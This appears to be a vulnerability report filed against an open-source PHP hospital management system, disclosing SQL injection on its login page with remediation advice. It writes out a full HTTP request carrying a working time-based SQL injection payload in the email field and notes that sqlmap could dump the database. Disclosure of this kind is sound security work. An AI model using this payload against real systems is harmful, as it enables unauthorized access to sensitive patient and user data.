Description
Hi
I found a SQL injection vulnerability in your hospital management system.
Loign page request -
POST /hospital-management-system-php-mysql-master/index.php HTTP/1.1
Host: 192.168.1.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 77
Origin: http://192.168.1.8
Connection: close
Referer: http://192.168.1.8/hospital-management-system-php-mysql-master/index.php
Cookie: PHPSESSID=svu2e3i3pe2cuvc8medpnjdp0f
Upgrade-Insecure-Requests: 1
lemail=test2@test.com'%2b(select*from(select(sleep(20)))a)%2b'&lpassword=1234
Above query will only sleep database for 20 second but Using SQLmap bad user can dump the database as show in image.
Control -
User inputs consumed by the application should be sanitized based on the data type and data sets. For example, user input for age should only be allowed to contain numbers. Blacklist approach where certains characters and keywords are sanitized is not recommended.
Remediation -
To prevent this follow the following steps:
a) Validate all input data against a whitelist
b) Use of parameterized queries
String selectStatement = "SELECT * FROM User WHERE userId = ? ";
PreparedStatement prepStmt = con.prepareStatement(selectStatement);
prepStmt.setString(1, userId);
ResultSet rs = prepStmt.executeQuery();